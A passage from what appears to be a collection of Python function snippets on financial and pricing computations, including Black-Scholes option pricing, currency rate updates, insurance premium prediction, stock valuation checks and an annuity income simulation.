\"LogNormal\":\n S = self._deal_terms[ \"underlyer\" ].spot_value\n K = self._deal_terms[ \"payoff\" ].payoff_terms[ \"strike\" ]\n time_to_mat = self._deal_terms[ \"maturity\" ] - self._pricing_date\n r = CSA_map[ self._deal_terms[ \"CSA\" ] ].short_rate\n d1 = 1 / ( vol * np.sqrt( time_to_mat ) ) * ( np.log( S / K ) + ( r + 0.5 * vol ** 2 ) * time_to_mat )\n d2 = d1 - vol * np.sqrt( time_to_mat ) \n CallPrice = S * norm.cdf( d1 ) - K * np.exp( -r * time_to_mat ) * norm.cdf( d2 ) \n\n if self._deal_terms[ \"payoff\" ].payoff_name == \"European Call\":\n return CallPrice\n elif self._deal_terms[ \"payoff\" ].payoff_name == \"European Put\":\n return CallPrice + K * np.exp( -r * time_to_mat ) - S \n else:\n raise NameError( \"Unsupported vol type : \" + self._deal_terms[ \"Payoff\" ].payoff_name )\n else:\n raise NameError( \"Unsupported vol type : \" + self._vol_type )", "def indexa_generate_currency_rates(self, parsed_data):\n Currency = self.env['res.currency']\n CurrencyRate = self.env['res.currency.rate']\n\n today = fields.Date.today()\n for company in self:\n for currency, (rate, date_rate) in parsed_data.items():\n rate_value = 1/rate\n\n currency_object = Currency.search([('name','=',currency)])\n already_existing_rate = CurrencyRate.search([\n ('currency_id', '=', currency_object.id),\n ('name', '=', date_rate),\n ('company_id', '=', company.id)\n ])\n if already_existing_rate:\n already_existing_rate.rate = rate_value\n else:\n CurrencyRate.create({'currency_id': currency_object.id,\n 'rate': rate_value,\n 'name': date_rate,\n 'company_id': company.id})", "def preprocess(data,scale):\n ##log_transformation\n #data['log_sale_price'] = np.log(data['sale_price'])\n #data['log_lot_area'] = np.log(data['lot_area'])\n #data['house_age'] = data['year_sold']- data['year_built']\n \n y = data['stay']\n \n #sales['log_sale_price'] = np.log(sales['sale_price'])\n #sales['log_lot_area'] = np.log(sales['lot_area'])\n #sales['house_age'] = sales['year_sold']- sales['year_built']\n data_dummy = data.copy()\n \n #dummy coding\n data_scale = pd.get_dummies(data_dummy).drop(columns = ['stay'])\n\n \n #scale the value\n if scale == True:\n S = StandardScaler().fit(data_scale)\n data_scale = S.transform(data_scale)\n \n return y, data_scale", "def populate_price_change_graph(market):\n data = list()\n labels = list()\n\n queryset = DailyStatistic.objects.filter(market=market).order_by('-date')[:10]\n\n for stat in queryset:\n try:\n data.append(round(stat.percent_change_dd*100))\n labels.append(\"{}.{}\".format(stat.date.day,stat.date.month))\n except TypeError:\n data.append(0)\n data.append('No data')\n\n\n data.reverse()\n labels.reverse()\n\n return data,labels", "def _prorata_rate(self, days_used, days_in_month):\n return (100 * days_used // days_in_month) / 100.0", "def calculateCurrentPercentageChange(self, Prices):\n threeDayMovingAverage = self.calculateLatestThreeDayMA(Prices)\n fifteenDayMovingAverage = self.calculateLatestFifteenDayMA(Prices)\n percentageChange = self.calculatePercentChange(\n fifteenDayMovingAverage, threeDayMovingAverage)\n return percentageChange", "def priceNormalize(self):\n # normalize feature 10, feature 11, feature 13\n # feature 0~7: flight number dummy variables\n # feature 8: departure date; feature 9: observed date state;\n # feature 10: minimum price; feature 11: maximum price\n # fearure 12: prediction(buy or wait); feature 13: price\n evalMatrix_train = np.concatenate((self.X_train, self.y_train, self.y_train_price), axis=1)\n evalMatrix_test = np.concatenate((self.X_test, self.y_test, self.y_test_price), axis=1)\n\n matrixTrain = np.empty(shape=(0, evalMatrix_train.shape[1]))\n matrixTest = np.empty(shape=(0, evalMatrix_train.shape[1]))\n for i in range(len(self.routes)):\n evalMatrix = evalMatrix_train[np.where(evalMatrix_train[:, i]==1)[0], :]\n evalMatrix[:, 10] *= self.currency[i]\n evalMatrix[:, 11] *= self.currency[i]\n evalMatrix[:, 13] *= self.currency[i]\n matrixTrain = np.concatenate((matrixTrain, evalMatrix), axis=0)\n\n evalMatrix = evalMatrix_test[np.where(evalMatrix_test[:, i]==1)[0], :]\n evalMatrix[:, 10] *= self.currency[i]\n evalMatrix[:, 11] *= self.currency[i]\n evalMatrix[:, 13] *= self.currency[i]\n matrixTest = np.concatenate((matrixTest, evalMatrix), axis=0)\n\n self.X_train = matrixTrain[:, 0:12]\n self.y_train = matrixTrain[:, 12]\n self.y_train_price = matrixTrain[:, 13]\n\n self.X_test = matrixTest[:, 0:12]\n self.y_test = matrixTest[:, 12]\n self.y_test_price = matrixTest[:, 13]\n\n self.y_train = self.y_train.reshape((self.y_train.shape[0], 1))\n self.y_train_price = self.y_train_price.reshape((self.y_train_price.shape[0], 1))\n self.y_test = self.y_test.reshape((self.y_test.shape[0], 1))\n self.y_test_price = self.y_test_price.reshape((self.y_test_price.shape[0], 1))", "def prepare_data(self):\r\n annual_df = self.annual_df\r\n coef_df = self.coef_df\r\n quarter_df = self.quarter_df\r\n # historical_df = self.historical_df\r\n Event_Buffer = self.Event_Buffer\r\n\r\n Tot_Prod = coef_df[\"Product\"].nunique()\r\n # Tot_Week = coef_df[\"wk\"].nunique()\r\n Tot_Week = 52\r\n\r\n EDLP_Events = list(annual_df[\"RP_Events\"])\r\n Min_EDLP_Events = [\r\n i - Event_Buffer if i - Event_Buffer >= 0 else 0 for i in EDLP_Events\r\n ]\r\n Max_EDLP_Events = [\r\n i + Event_Buffer if i + Event_Buffer < Tot_Week + 1 else Tot_Week\r\n for i in EDLP_Events\r\n ]\r\n\r\n TPR_Events = list(annual_df[\"TPR_Events\"])\r\n Min_TPR_Events = [\r\n i - Event_Buffer if i - Event_Buffer >= 0 else 0 for i in TPR_Events\r\n ]\r\n Max_TPR_Events = [\r\n i + Event_Buffer if i + Event_Buffer < Tot_Week + 1 else Tot_Week\r\n for i in TPR_Events\r\n ]\r\n\r\n Target_EDLP_Spend = [i for i in annual_df[\"PPG_RP_Spend\"]]\r\n Target_TPR_Spend = [i for i in annual_df[\"PPG_TPR_Spend\"]]\r\n Target_Trade_Spend = [i for i in annual_df[\"PPG_Total_Spend\"]]\r\n\r\n Mapping = {}\r\n Prod_Ind = coef_df[\"Product\"][0:Tot_Prod]\r\n for i, j in zip(Prod_Ind.index, Prod_Ind.values):\r\n Mapping[j] = i\r\n Mapping_reverse = {i: j for j, i in Mapping.items()}\r\n\r\n constants = [i for i in coef_df[\"constant\"]]\r\n\r\n Cat_Coef = coef_df[\"Catalogue\"][0:Tot_Prod]\r\n\r\n Disp_Coef = coef_df[\"Display\"][0:Tot_Prod]\r\n\r\n Base_Price_stg1 = [i for i in quarter_df[\"Final_baseprice\"]]\r\n Intercepts_stg1 = []\r\n for pr in range(Tot_Prod):\r\n Intercepts_stg1.append(\r\n np.mean([constants[j * Tot_Prod + pr] for j in range(0, Tot_Week)])\r\n )\r\n\r\n Base_Price_stg2 = [[i] * Tot_Week for i in quarter_df[\"Final_baseprice\"]]\r\n Intercepts_stg2 = [\r\n constants[j : j + Tot_Prod] for j in range(0, len(constants), Tot_Prod)\r\n ] # noqa\r\n\r\n EDLP_Coef = np.array(\r\n coef_df[[i for i in coef_df.columns if i.count(\"Retailer_Regular\") == 1]]\r\n )\r\n TPR_Coef = np.array(\r\n coef_df[[i for i in coef_df.columns if i.count(\"Retailer_Promoted\") == 1]]\r\n )\r\n\r\n # ################################ Available EDLP Interactions pairs ##############################\r\n\r\n EDLP = [\r\n re.findall(r\"[0-9]+\", i)\r\n for i in coef_df.columns\r\n if i.count(\"Retailer_Regular\") > 1\r\n ]\r\n EDLP_Interactions = []\r\n for i in EDLP:\r\n temp = []\r\n for j in i:\r\n temp.append(int(j))\r\n EDLP_Interactions.append(temp)\r\n\r\n # ###################################### Available TPR Interactions pairs #########################\r\n\r\n TPR = [\r\n re.findall(r\"[0-9]+\", i)\r\n for i in coef_df.columns\r\n if i.count(\"Retailer_Promoted\") > 1\r\n ]\r\n TPR_Interactions = []\r\n for i in TPR:\r\n temp = []\r\n for j in i:\r\n temp.append(int(j))\r\n TPR_Interactions.append(temp)\r\n\r\n # ###################################### EDLP_Interaction_Coef_Values ############################\r\n\r\n EDLP_Int_Coef_Values = {}\r\n for col in coef_df.columns:\r\n if col.count(\"Retailer_Regular\") > 1:\r\n Pair_name = \"_\".join([str(int(i)) for i in re.findall(r\"[0-9]+\", col)])\r\n EDLP_Int_Coef_Values[Pair_name] = list(coef_df[col])\r\n\r\n # ###################################### TPR_Interaction_Coef_Values #############################\r\n\r\n TPR_Int_Coef_Values = {}\r\n for col in coef_df.columns:\r\n if col.count(\"Retailer_Promoted\") > 1:\r\n Pair_name = \"_\".join([str(int(i)) for i in re.findall(r\"[0-9]+\", col)])\r\n TPR_Int_Coef_Values[Pair_name] = list(coef_df[col])\r\n\r\n # ##################################### Loading Pantry Loading Coefficients #######################\r\n\r\n Pantry_1 = list(coef_df[\"Pantry_Loading_1\"])\r\n Pantry_1 = [\r\n Pantry_1[j : j + Tot_Prod] for j in range(0, len(Pantry_1), Tot_Prod)\r\n ]\r\n Pantry_2 = list(coef_df[\"Pantry_Loading_2\"])\r\n Pantry_2 = [\r\n Pantry_2[j : j + Tot_Prod] for j in range(0, len(Pantry_2), Tot_Prod)\r\n ]\r\n\r\n # TE_Coeff = np.array(Promo_df[[\"TE_Promo\",\"TE_NoPromo\"]])\r\n self.Tot_Prod = Tot_Prod\r\n self.Tot_Week = Tot_Week\r\n self.EDLP_Events = EDLP_Events\r\n self.Min_EDLP_Events = Min_EDLP_Events\r\n self.Max_EDLP_Events = Max_EDLP_Events\r\n self.TPR_Events = TPR_Events\r\n self.Min_TPR_Events = Min_TPR_Events\r\n self.Max_TPR_Events = Max_TPR_Events\r\n\r\n self.Target_EDLP_Spend = Target_EDLP_Spend\r\n self.Target_TPR_Spend = Target_TPR_Spend\r\n self.Target_Trade_Spend = Target_Trade_Spend\r\n self.Mapping = Mapping\r\n self.Mapping_reverse = Mapping_reverse\r\n self.constants = constants\r\n self.EDLP_Coef = EDLP_Coef\r\n self.TPR_Coef = TPR_Coef\r\n\r\n self.EDLP_Interactions = EDLP_Interactions\r\n self.TPR_Interactions = TPR_Interactions\r\n self.EDLP_Int_Coef_Values = EDLP_Int_Coef_Values\r\n self.TPR_Int_Coef_Values = TPR_Int_Coef_Values\r\n self.Pantry_1 = Pantry_1\r\n self.Pantry_2 = Pantry_2\r\n\r\n self.Base_Price_stg1 = Base_Price_stg1\r\n self.Intercepts_stg1 = Intercepts_stg1\r\n self.Base_Price_stg2 = Base_Price_stg2\r\n self.Intercepts_stg2 = Intercepts_stg2\r\n\r\n self.Cat_Coef = Cat_Coef\r\n self.Disp_Coef = Disp_Coef", "def add_change_features(df):\n # copy input for comparison of outputs\n df_copy = df.copy()\n\n # calculate interval change features\n df_copy[\"Duration_Start\"] = (\n df_copy[\"Schedule_Start\"] - df_copy[\"Design_Start\"]\n ).dt.days\n df_copy[\"Duration_End\"] = (\n df_copy[\"Schedule_End\"] - df_copy[\"Design_Start\"]\n ).dt.days\n df_copy[\"Schedule_Change\"] = (\n df_copy[\"Duration_End\"] - df_copy[\"Duration_Start\"]\n )\n df_copy[\"Budget_Change\"] = df_copy[\"Budget_End\"] - df_copy[\"Budget_Start\"]\n\n # define schedule change ratio\n df_copy[\"Schedule_Change_Ratio\"] = (\n df_copy[\"Schedule_Change\"] / df_copy[\"Duration_Start\"]\n )\n # define budget change ratio\n df_copy[\"Budget_Change_Ratio\"] = (\n df_copy[\"Budget_Change\"] / df_copy[\"Budget_Start\"]\n )\n\n # define project metrics\n df_copy[\"Budget_Abs_Per_Error\"] = (\n df_copy[\"Budget_Start\"] - df_copy[\"Budget_End\"]\n ).abs() / df_copy[\"Budget_End\"]\n\n df_copy[\"Budget_Rel_Per_Error\"] = (\n df_copy[\"Budget_Start\"] - df_copy[\"Budget_End\"]\n ).abs() / df_copy[\"Budget_Start\"]\n\n df_copy[\"Duration_End_Ratio\"] = (\n df_copy[\"Duration_End\"] / df_copy[\"Duration_Start\"]\n )\n df_copy[\"Budget_End_Ratio\"] = (\n df_copy[\"Budget_End\"] / df_copy[\"Budget_Start\"]\n )\n\n # previously titled 'Mark Metric'\n df_copy[\"Duration_Ratio_Inv\"] = (\n df_copy[\"Duration_Start\"] / df_copy[\"Duration_End\"]\n ) - 1\n df_copy[\"Budget_Ratio_Inv\"] = (\n df_copy[\"Budget_Start\"] / df_copy[\"Budget_End\"]\n ) - 1\n\n return df_copy", "def predict_premium(self, X_raw):\n # =============================================================\n # You can include a pricing strategy here\n # For example you could scale all your prices down by a factor\n\n # YOUR CODE HERE\n\n # Remember to include a line similar to the one below\n # X_clean = self._preprocessor(X_raw)\n \n X, drop_index = self._preprocessor(X_raw, train=False)\n if len(drop_index) > 0:\n print(\"Some rows of X_raw contain NAs, the corresponding rows are skipped\")\n \n #claim_made = self.Model_made.predict(X)\n claim_made = self.Model_made.predict_proba(X)[:,1]\n #print(sum(claim_made>0.28))\n \n decision_threshold = 0.28 #90% boundary\n \n #claim_made = np.where(claim_made>decision_threshold, 1, 0).reshape(-1)\n claim_made = np.where(claim_made>decision_threshold, 1, 0)\n claim_amount = np.repeat(80,len(claim_made))\n claim_made_idx = np.arange(len(claim_made))[claim_made == 1]\n \n X_claim_amount = X[claim_made_idx,:]\n #pred = self.Model_claim.predict(X_claim_amount).reshape(-1)\n pred = self.Model_claim.predict(X_claim_amount)*self.y_std + self.y_mean\n claim_amount[claim_made == 1] = np.round(pred,4)\n prediction = pd.DataFrame({\"claim_amount\":claim_amount})\n return prediction", "async def score(self, ctx):\r\n with DB() as db:\r\n companies = db.query(Company).filter(Company.active == True).all()\r\n scores = []\r\n for company in companies:\r\n history = db.query(CompanyHistory).filter(CompanyHistory.company == company.id).order_by(CompanyHistory.date.desc()).first()\r\n scores.append([company.name, round(history.value, 2)])\r\n headers = ['Company', 'Net Worth']\r\n score_df = pd.DataFrame(scores, columns=headers)\r\n score_df = score_df.sort_values(['Net Worth'], ascending=False)\r\n aggregated = tabulate(score_df.values.tolist(), headers=headers)\r\n await ctx.send(f\"```{aggregated}```\")", "def tx_fees_VS_miners_revenue(df):\n\n miners_revenue_USD = df['Miners Revenue (USD)']\n tx_fees_USD = df['Tx fees (USD)']\n result = tx_fees_USD.div(miners_revenue_USD)\n result.name = 'Tx Fees / Miners Revenue'\n return out(SETTINGS, df, result)", "def price_to_3_year_earnings_less_than_15(self):\n\n note = ''\n # check if 'EPS' exists\n if 'EPS' not in self.stock.main_df.columns:\n note = note + 'Could not find EPS on MacroTrends. '\n\n # check if Current price is not 0\n if self.stock.stats_dict['Current Price'] == 0:\n note = note + 'Could not find current price on MacroTrends. '\n\n if note != '':\n self.stock.append_calc_result('3 year P/E ratio < 15 ?', 'N/A', 'N/A', note)\n return\n\n curr_price = self.stock.stats_dict['Current Price']\n df = self.stock.main_df\n\n average = 0\n # i want to use 2020 if not empty and 2019 if 2020 is empty\n if not np.isnan(df.iloc[0]['EPS']):\n # current year is there\n past_3_years_df = df.iloc[0: 3]['EPS']\n average = past_3_years_df.mean()\n elif np.isnan(df.iloc[0]['EPS']):\n # current year is not there\n past_3_years_df = df.iloc[1: 4]['EPS']\n average = past_3_years_df.mean()\n if np.isnan(df.iloc[1]['EPS']):\n # past year is not there either\n past_7_years_df = df.iloc[2: 5]['EPS']\n average = past_7_years_df.mean()\n if np.isnan(df.iloc[2]['EPS']):\n self.stock.append_calc_result('7 year P/E ratio < 25 ?', 'N/A', 'N/A',\n 'Must not have filed their annual report for {}'.format(\n self.current_year - 2))\n return\n\n if average == 0:\n self.stock.append_calc_result('3 year P/E ratio < 15 ?', 'N/A', 'N/A',\n 'No average found')\n return\n elif (curr_price / average) <= 15:\n criteria_passed = 'Yes'\n else:\n criteria_passed = 'No'\n\n self.stock.append_calc_result('3 year P/E ratio < 15 ?', round((curr_price / average), 2),\n criteria_passed, '3 Year Average EPS = {}'.format(round(average, 2)))", "def sub_tax_sales_transfer_pricing(manager, df_fields, seq_recs, seq_reservas):\n # df_hotel = manager.get_dataframe(tables['dwc_bok_t_canco_hotel'])\n # df_circuit = manager.get_dataframe(tables['dwc_bok_t_canco_hotel_circuit'])\n # df_other = manager.get_dataframe(tables['dwc_bok_t_canco_other'])\n # df_transfer = manager.get_dataframe(tables['dwc_bok_t_canco_transfer'])\n # df_endow = manager.get_dataframe(tables['dwc_bok_t_canco_endowments'])\n # df_extra = manager.get_dataframe(tables['dwc_bok_t_canco_extra'])\n\n df_aux = df_fields.select(\"operative_incoming\", \"booking_id\")\n\n df_hotel = sub_tax_sales_transfer_pricing_aux(manager, df_hotelt, seq_recs, seq_reservas, df_aux)\n df_circuit = sub_tax_sales_transfer_pricing_aux(manager, df_circuitt, seq_recs, seq_reservas, df_aux)\n df_other = sub_tax_sales_transfer_pricing_aux(manager, df_othert, seq_recs, seq_reservas, df_aux)\n df_transfer = sub_tax_sales_transfer_pricing_aux(manager, df_transfert, seq_recs, seq_reservas, df_aux)\n df_endow = sub_tax_sales_transfer_pricing_aux(manager, df_endowt, seq_recs, seq_reservas, df_aux)\n df_extra = sub_tax_sales_transfer_pricing_aux_extra(manager, df_extrat, seq_recs, seq_reservas, df_aux)\n\n df_impuesto_canal = df_hotel.union(df_circuit).union(df_other).union(df_transfer).union(df_endow).union(\n df_extra)\n\n df_impuesto_canal = df_impuesto_canal.groupBy(\"seq_rec\", \"seq_reserva\") \\\n .agg({'impuesto_canal': 'sum'}).withColumnRenamed(\"SUM(impuesto_canal)\", \"Tax_Sales_Transfer_pricing\")\n\n df_fields = df_fields.join(df_impuesto_canal, [df_fields.operative_incoming == df_impuesto_canal.seq_rec,\n df_fields.booking_id == df_impuesto_canal.seq_reserva],\n 'left_outer').drop(df_impuesto_canal.seq_rec).drop(df_impuesto_canal.seq_reserva)\n\n df_fields = df_fields.na.fill({\"Tax_Sales_Transfer_pricing\": 0})\n\n df_fields = df_fields.withColumn(\"Tax_Sales_Transfer_pricing\",\n udf_round_ccy(df_fields.Tax_Sales_Transfer_pricing,\n df_fields.booking_currency))\n\n del df_hotel, df_circuit, df_other, df_transfer, df_endow, df_extra, df_impuesto_canal\n\n return df_fields", "def income_model_asset_based_portfolio_custom(num_of_years=30, trials=100, method='normal', income=True):\n\n sim_fia_cv = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_base_total = pd.DataFrame(index=range(num_of_years + 1))\n sim_base_income = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_port_total = pd.DataFrame(index=range(num_of_years + 1))\n sim_port_income = pd.DataFrame(index=range(num_of_years + 1))\n\n sim_base_total_pre_income = pd.DataFrame(index=range(num_of_years + 1))\n sim_port_total_pre_income = pd.DataFrame(index=range(num_of_years + 1))\n\n # read_income_inputs = pd.read_csv(src + \"income_model_inputs.csv\", index_col='Items')\n read_income_inputs = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='income_model_inputs',\n index_col=[0])\n\n # read_returns_est = pd.read_csv(src + \"income_assets_returns_estimates.csv\", index_col='Symbol')\n read_returns_est = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='income_assets_returns_estimates',\n index_col=[0])\n\n clean_names = list(read_returns_est.index)\n clean_names = [s.split(' ')[0] for s in clean_names]\n read_returns_est.loc[:, 'names'] = clean_names\n read_returns_est.set_index('names', drop=True, inplace=True)\n read_returns_est = read_returns_est[:-1]\n read_returns_est.rename(index={'SBMMTB3': 'Cash', read_returns_est.index[-1]: 'FIA'}, inplace=True)\n\n # ---------------Returns DataFrame based on the use input------------------------------------\n ann_ret = np.full((num_of_years + 1, len(read_returns_est)), read_returns_est.loc[:, 'Annualized Returns'])\n read_normal = pd.DataFrame(ann_ret, index=np.arange(num_of_years + 1), columns=read_returns_est.index)\n # read_normal.rename(columns={read_normal.columns[-1]: 'FIA'}, inplace=True)\n user_est_fia_return = float(read_income_inputs.loc['fia_forecast', 'inputs'])\n read_normal.loc[:, 'FIA'] = user_est_fia_return\n\n read_returns_est.loc['FIA', 'Annualized Returns'] = user_est_fia_return\n\n # read_returns_est.drop(['BM', read_returns_est.index[-1]], axis=0, inplace=True)\n # read_portfolio_inputs = pd.read_csv(src + \"income_portfolio_inputs.csv\", index_col='Items')\n\n # read_asset_weights = pd.read_csv(src + \"asset_weights.csv\", index_col='Asset')\n read_asset_weights = pd.read_excel(src + \"portfolio_information.xlsx\", sheet_name='asset_weights',\n index_col=[0])\n\n read_asset_weights.drop(read_asset_weights.index[-1], axis=0, inplace=True)\n\n # read random returns for simulation\n # read_normal = pd.read_csv(src + 'sort_normal.csv', index_col=[0], parse_dates=True)\n # read_small = pd.read_csv(src + 'sort_small_to_large.csv', index_col=[0], parse_dates=True)\n # read_large = pd.read_csv(src + 'sort_large_to_small.csv', index_col=[0], parse_dates=True)\n assets_col_names = list(read_normal.columns)\n\n tickers = list(read_asset_weights.index)\n wts = np.array(read_asset_weights.loc[:, 'base'])\n\n def asset_median_returns(data, ticker):\n return data.filter(regex=ticker).median(axis=1)\n\n # dataframe for unsorted returns (normal)\n median_returns_normal = pd.DataFrame({t: asset_median_returns(read_normal, t) for t in tickers})\n median_returns_normal.loc[:, 'portfolio_return'] = median_returns_normal.dot(wts)\n median_normal_fia = pd.DataFrame({'FIA': asset_median_returns(read_normal, 'FIA')})\n #\n # # dataframe for smallest to largest returns\n # median_returns_smallest = pd.DataFrame({t: asset_median_returns(read_small, t) for t in tickers})\n # median_returns_smallest.loc[:, 'portfolio_return'] = median_returns_smallest.dot(wts)\n # median_smallest_fia = pd.DataFrame({'FIA': asset_median_returns(read_small, 'r_FIA')})\n #\n # # dataframe for unsorted returns (normal)\n # median_returns_largest = pd.DataFrame({t: asset_median_returns(read_large, t) for t in tickers})\n # median_returns_largest.loc[:, 'portfolio_return'] = median_returns_largest.dot(wts)\n # median_largest_fia = pd.DataFrame({'FIA': asset_median_returns(read_large, 'r_FIA')})\n\n years = list(range(0, num_of_years + 1))\n income_cols = ['year', 'strategy_term', 'index_returns', 'term_ret', 'term_ret_with_par', 'term_annualize',\n 'ann_net_spread', 'term_ret_netspr', 'high_inc_benefit_base', 'rider_fee', 'eoy_income',\n 'contract_value']\n\n term = int(read_income_inputs.loc['term', 'inputs'])\n fia_ret = read_returns_est.loc[read_returns_est.index[-1], 'Annualized Returns']\n fia_risk = read_returns_est.loc[read_returns_est.index[-1], 'Annualized Risk']\n par_rate = float(read_income_inputs.loc['par_rate', 'inputs'])\n spread = float(read_income_inputs.loc['spread', 'inputs'])\n bonus_term = int(read_income_inputs.loc['bonus_term', 'inputs'])\n premium = float(read_income_inputs.loc['premium', 'inputs'])\n income_bonus = float(read_income_inputs.loc['income_bonus', 'inputs'])\n\n income_starts = int(read_income_inputs.loc['start_income_years', 'inputs'])\n income_growth = float(read_income_inputs.loc['income_growth', 'inputs'])\n rider_fee = float(read_income_inputs.loc['rider_fee', 'inputs'])\n inc_payout_factor = float(read_income_inputs.loc['income_payout_factor', 'inputs'])\n contract_bonus = float(read_income_inputs.loc['contract_bonus', 'inputs'])\n social = float(read_income_inputs.loc['social', 'inputs'])\n inflation = float(read_income_inputs.loc['inflation', 'inputs'])\n wtd_cpn_yield = float(read_income_inputs.loc['wtd_coupon_yld', 'inputs'])\n life_expectancy = int(read_income_inputs.loc['life_expectancy_age', 'inputs'])\n clients_age = int(read_income_inputs.loc['clients_age', 'inputs'])\n\n # ---------------INCOME MODEL--------------------------------------------\n runs = 0\n returns_dict = {}\n asset_dict = {}\n fia_dict = {}\n while runs < trials:\n print(runs)\n\n income_df = pd.DataFrame(index=years, columns=income_cols)\n income_df.loc[:, 'year'] = years\n income_df.loc[:, 'strategy_term'] = income_df.loc[:, 'year'] % term\n income_df.loc[:, 'strategy_term'] = income_df['strategy_term'].apply(lambda x: 1 if x == 0 else 0)\n\n income_df.loc[:, 'index_returns'] = read_normal.loc[:, 'FIA']\n # income_df.loc[:, 'index_returns'] = np.random.normal(fia_ret, fia_risk, size=(len(years), 1))\n\n cumprod = (1. + income_df['index_returns']).rolling(window=term).agg(lambda x: x.prod()) - 1\n income_df.loc[:, 'term_ret'] = np.where(income_df.loc[:, 'strategy_term'] == 1, cumprod, 0)\n income_df.loc[:, 'term_ret_with_par'] = income_df.loc[:, 'term_ret'] * par_rate\n income_df.loc[:, 'term_annualize'] = income_df.loc[:, 'term_ret_with_par'].apply(\n lambda x: (1 + x) ** (1 / term) - 1)\n income_df.loc[:, 'ann_net_spread'] = income_df.loc[:, 'term_annualize'] - spread\n income_df.loc[:, 'ann_net_spread'] = np.where(income_df.loc[:, 'strategy_term'] == 1,\n income_df.loc[:, 'ann_net_spread'], 0)\n income_df.loc[:, 'term_ret_netspr'] = income_df.loc[:, 'ann_net_spread'].apply(lambda x: (1 + x) ** term - 1)\n\n for counter in years:\n if counter == 0:\n income_df.loc[counter, 'high_inc_benefit_base'] = premium * (1 + income_bonus)\n\n elif counter <= min(bonus_term, income_starts):\n income_df.loc[counter, 'high_inc_benefit_base'] = income_df.loc[counter - 1, 'high_inc_benefit_base'] * \\\n (1 + income_growth)\n else:\n income_df.loc[counter, 'high_inc_benefit_base'] = income_df.loc[counter - 1, 'high_inc_benefit_base']\n\n income_df.loc[:, 'rider_fee'] = income_df.loc[:, 'high_inc_benefit_base'] * rider_fee\n income_df.loc[:, 'eoy_income'] = np.where(income_df.loc[:, 'year'] > income_starts,\n income_df.loc[:, 'high_inc_benefit_base'] * inc_payout_factor, 0)\n\n for counter in years:\n if counter == 0:\n income_df.loc[counter, 'contract_value'] = premium * (1 + contract_bonus)\n\n elif income_df.loc[counter, 'strategy_term'] == 1:\n x1 = income_df.loc[counter - 1, 'contract_value'] - income_df.loc[counter, 'rider_fee']\n x2 = (x1 * (1 + income_df.loc[counter, 'term_ret_netspr'])) - income_df.loc[counter, 'eoy_income']\n income_df.loc[counter, 'contract_value'] = x2\n\n else:\n x1 = income_df.loc[counter - 1, 'contract_value'] - income_df.loc[counter, 'rider_fee'] - \\\n income_df.loc[counter, 'eoy_income']\n\n income_df.loc[counter, 'contract_value'] = x1\n\n # variable stores the income number that is used in the base and fia portfolio calcs.\n\n income_from_fia = income_df.loc[income_df.index[-1], 'eoy_income']\n\n income_df.loc[:, 'contract_value'] = income_df.loc[:, 'contract_value'].apply(lambda x: 0 if x <= 0 else x)\n\n sim_fia_cv.loc[:, str(runs)] = income_df.loc[:, 'contract_value']\n\n # -------------------------------------BASE MODEL---------------------------------------------\n\n base_wts = read_asset_weights.loc[:, 'base']\n base_assets = list(base_wts.index)\n base_weights = list(base_wts.values)\n base_returns = list(read_returns_est.loc[:, 'Annualized Returns'].values)\n base_std = list(read_returns_est.loc[:, 'Annualized Risk'].values)\n\n base_investment = float(read_income_inputs.loc['risky_assets', 'Base'])\n adv_fees = float(read_income_inputs.loc['advisor_fees', 'Base'])\n\n # -------------------required income----------------------------------\n if income:\n req_annual_income = float(read_income_inputs.loc['annual_income', 'inputs'])\n income_needed = req_annual_income - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n cpn_income_base = base_investment * wtd_cpn_yield\n else:\n req_annual_income = 0.0\n income_needed = 0.0\n income_net_fia_income = 0.0\n cpn_income_base = base_investment * wtd_cpn_yield\n\n # ----------------------RANDOM RETURNS--------------------------\n r_cols = ['r_{}'.format(name) for name in base_assets]\n boy_value = ['bv_{}'.format(name) for name in base_assets]\n eoy_value = ['ev_{}'.format(name) for name in base_assets]\n\n random_returns = pd.DataFrame(index=income_df.index, columns=r_cols)\n\n # for c in range(len(r_cols)):\n # ret = np.random.normal(base_returns[c], base_std[c], size=(len(random_returns.index), 1))\n\n # this_run_cols = ['{}_{}'.format(cname, str(runs)) for cname in r_cols]\n random_returns = read_normal.loc[:, base_assets]\n\n # random_returns.loc[:, r_cols[c]] = ret.flatten()\n # asset_dict.update({'{}_{}'.format(r_cols[c], str(runs)): ret.flatten()})\n\n # store the simulated assets returns in one dictionary\n # returns_dict.update({str(runs): random_returns})\n\n # collect the asset based returns from all simulation and calculate the median returns.\n # def get_median_returns(sym):\n # cols = [sym + '_' + str(c) for c in np.arange(trials)]\n # asset_df = pd.DataFrame({c: asset_dict.get(c) for c in cols})\n # return asset_df.median(axis=1)\n #\n # asset_median_returns = pd.DataFrame({symbol: get_median_returns(symbol) for symbol in r_cols})\n #\n # asset_median_returns.loc[:, 'simulated_portfolio_median_returns'] = asset_median_returns.dot(base_weights)\n\n base_df = random_returns.copy()\n\n # base_investment = float(read_portfolio_inputs.loc['risky_assets', 'Base'])\n\n fia_portfolio_df = random_returns.copy()\n port_investment = float(read_income_inputs.loc['risky_assets', 'FIA'])\n cpn_income_port = port_investment * wtd_cpn_yield\n\n # ----------------------------------------BASE PORTFOLIO----------------------------\n for name in boy_value:\n base_df.loc[:, name] = 0.0\n\n for counter in years:\n period_returns = list(random_returns.loc[counter, :])\n if counter == 0:\n\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment for c in range(len(boy_value))]\n\n base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'total_net_fees'] = 0.0\n base_df.loc[counter, 'income'] = 0.0\n base_investment = base_df.loc[counter, boy_value].sum()\n\n elif (counter > 0) and (counter < income_starts):\n\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'adv_fees'] = base_df.loc[counter, 'total'] * adv_fees\n base_df.loc[counter, 'total_net_fees'] = base_df.loc[counter, 'total'] - base_df.loc[\n counter, 'adv_fees']\n\n # --coupon payment is invested back into the risky portfolio until the income is withdrawn----\n base_investment = base_df.loc[counter, 'total_net_fees'] + cpn_income_base\n\n else:\n\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n base_df.loc[counter, 'total'] = 